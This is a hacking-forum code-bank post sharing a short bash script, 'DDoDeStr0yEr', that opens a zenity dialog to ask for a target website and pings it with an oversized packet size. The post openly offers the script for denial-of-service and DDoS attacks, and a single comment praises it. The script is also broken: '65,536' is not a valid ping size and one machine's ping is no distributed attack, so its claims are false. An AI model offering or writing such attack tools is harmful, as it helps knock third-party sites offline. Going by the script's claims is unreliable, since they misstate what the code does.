Welcome to HBH! If you have tried to register and didn't get a verification email, please using the following link to resend the verification email.
"DDoDeStr0yEr" Zenity GUI Denial of Service Tool - Bash Code Bank
"DDoDeStr0yEr" Zenity GUI Denial of Service Tool
Use this for Distributed Denial of Service or Denial of Service attacks.
#Author: PoisonAcid
#!/bin/bash
get_info ()
{
zenity --entry --text "Input website to DDoDeStr0y..." # Pops up query window . . .
#+ and prints user entry to stdout.
# Also try the --calendar and --scale options.
}
answer=$( get_info ) # Capture stdout in $answer variable.
ping -s 65,536 "$answer"
Comments
Tek-E 12 years ago
Good Idea. The get_info function isn't really necessary for storing the output from zenity into a variable. But I like the user friendly touch:happy: